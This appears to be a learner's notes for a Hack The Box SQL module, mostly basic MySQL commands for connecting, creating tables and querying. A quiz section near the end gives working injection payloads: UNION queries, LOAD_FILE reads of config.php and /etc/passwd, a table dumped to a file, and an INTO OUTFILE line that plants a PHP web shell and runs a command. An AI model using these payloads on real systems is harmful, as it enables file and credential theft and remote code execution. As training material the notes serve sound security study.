mysql

Apache's configuration is found at /etc/apache2/apache2.conf

Nginx's configuration at /etc/nginx/nginx.conf

IIS configuration at %WinDir%\System32\Inetsrv\Config\ApplicationHost.config
# Connect as root; -p with no value makes the client prompt for the password
mysql -u root -p
# Password given inline (no space after -p); an inline password can be exposed through
# shell history and the process list, so the interactive prompt above is the safer form
mysql -u root -p<password>
# Remote server: -h sets the host, -P (uppercase) sets the port
mysql -u root -h docker.hackthebox.eu -P 3306 -p 
-- Create a database named users
CREATE DATABASE users;
-- First version of logins: four plain columns, no constraints or defaults
CREATE TABLE logins (
    id INT,
    username VARCHAR(100),
    password VARCHAR(100),
    date_of_joining DATETIME
    );
    
-- Second version with constraints: id is the auto-incrementing primary key,
-- username must be unique and non-null, date_of_joining defaults to NOW().
-- It reuses the name logins, so it is an alternative to the definition above,
-- not a statement to run after it.
-- NOTE(review): password is a plain VARCHAR and the examples on this page insert
-- cleartext values; outside a lab, store a salted password hash in this column.
CREATE TABLE logins (
    id INT NOT NULL AUTO_INCREMENT,
    username VARCHAR(100) UNIQUE NOT NULL,
    password VARCHAR(100) NOT NULL,
    date_of_joining DATETIME DEFAULT NOW(),
    PRIMARY KEY (id)
    );
# Will display the details of that table such as fields and data types
DESCRIBE logins;
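# AUTO_INCREMENT assigns the next id automatically; duplicates are prevented by the PRIMARY KEY (id) constraint in the table definition, not by AUTO_INCREMENT itself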
id INT NOT NULL AUTO_INCREMENT,
# NOW() supplies the current date and time as the default when no value is given
date_of_joining DATETIME DEFAULT NOW(),
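# --skip-ssl turns TLS off for the connection (it does more than skip certificate verification), so the password and queries cross the network unencrypted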
mysql -u root -h 94.237.61.84 -P 59610 -p --skip-ssl
-- General form: one value per column, in the table's column order
INSERT INTO table_name VALUES (column1_value, column2_value, column3_value, ...);

-- No column list, so a value is supplied for every column of logins, in order
INSERT INTO logins VALUES(1, 'admin', 'p@ssw0rd', '2020-07-02');

-- Only username and password are named; with the constrained logins definition,
-- id comes from AUTO_INCREMENT and date_of_joining from its NOW() default.
-- Two rows are inserted by the one statement.
INSERT INTO logins(username, password) VALUES ('john', 'john123!'), ('tom', 'tom123!');
show databases;

use database1;

show tables;
SELECT * FROM table_name;

SELECT column1, column2 FROM table_name;
# Remove table
DROP TABLE logins;
ALTER TABLE logins ADD newColumn INT;

# Rename a column
ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn;

# Change the datatype of a column
ALTER TABLE logins MODIFY oldColumn DATE;

# Remove a column
ALTER TABLE logins DROP oldColumn;
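# Update a column; the WHERE clause limits which rows change (here every row with id > 1) - without it, every row in the table is updated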
UPDATE logins SET password = 'change_password' WHERE id > 1;
# Arrange the result
SELECT * FROM logins ORDER BY password;

# Asc or Desc
SELECT * FROM logins ORDER BY password DESC;

SELECT * FROM logins ORDER BY password DESC, id ASC;

# Limiting the result
SELECT * FROM logins LIMIT 2;

# Offset form: LIMIT offset, count
# The offset is zero-based, like an array index, so the first row is at offset 0
# LIMIT 1, 2 skips the first row and returns the next two (ids 2 and 3 here)
SELECT * FROM logins LIMIT 1, 2;
SELECT * FROM logins WHERE id > 1;

SELECT * FROM logins where username = 'admin';

# Match usernames that start with 'admin' (% matches zero or more characters)
SELECT * FROM logins WHERE username LIKE 'admin%';

# Select usernames that are exactly 3 characters long (each _ matches a single character)
SELECT * FROM logins WHERE username like '___';
SELECT 1 = 1 AND 'test' = 'test';
SELECT 1 = 1 && 'test' = 'abc';

SELECT 1 = 1 OR 'test' = 'abc';
SELECT 1 = 1 || 'test' = 'abc';

# Both return 0, which means false (1 = 1 is true and NOT inverts it; 1 != 1 is false)
SELECT NOT 1 = 1;
SELECT 1 != 1;

# Returns 1, which means true (1 = 2 is false and NOT inverts it)
SELECT NOT 1 = 2;

SELECT * FROM logins WHERE username != 'john';
SELECT * FROM logins WHERE username != 'john' AND id > 1;
SELECT * FROM logins WHERE username != 'tom' AND id > 3 - 2;
# Quizzes 

select * from titles where emp_no > 10000 or title !='engineer';

select first_name,last_name,hire_date from employees where first_name like 'Bar%' and hire_date = '1990-01-01';

select * from employees UNION select dept_no,dept_name,3,4,5,6 from departments;

' UNION select 1,user(),3,4-- -

cn' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -

cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
/shell.php?0=cat ../flag.txt
# Union 
UNION SELECT username, 2, 3, 4 from passwords-- '
# Shows the super_priv flag (Y/N) from mysql.user; without a WHERE clause this lists every account, not only the current db user
SELECT super_priv FROM mysql.user
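# Returns the contents of /etc/passwd as a string; LOAD_FILE gives NULL when the file cannot be read (missing FILE privilege, secure_file_priv restriction, or file permissions)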
SELECT LOAD_FILE('/etc/passwd');
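# secure_file_priv limits where the server may read and write files (LOAD_FILE, LOAD DATA, SELECT ... INTO OUTFILE)
# Empty value: no directory restriction, so we can read files anywhere the MySQL server process has access
# NULL: file import and export are disabled, so we can't read or write files at all
# A directory path: file operations are confined to that directory
# In every case the user also needs the FILE privilege; keeping secure_file_priv at NULL or a dedicated directory and not granting FILE to application accounts closes this path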
SHOW VARIABLES LIKE 'secure_file_priv';

SELECT variable_name, variable_value FROM information_schema.global_variables where variable_name="secure_file_priv"
SELECT 'this is a test' INTO OUTFILE '/tmp/test.txt';

SELECT * from users INTO OUTFILE '/tmp/credentials';

cat /tmp/credentials;
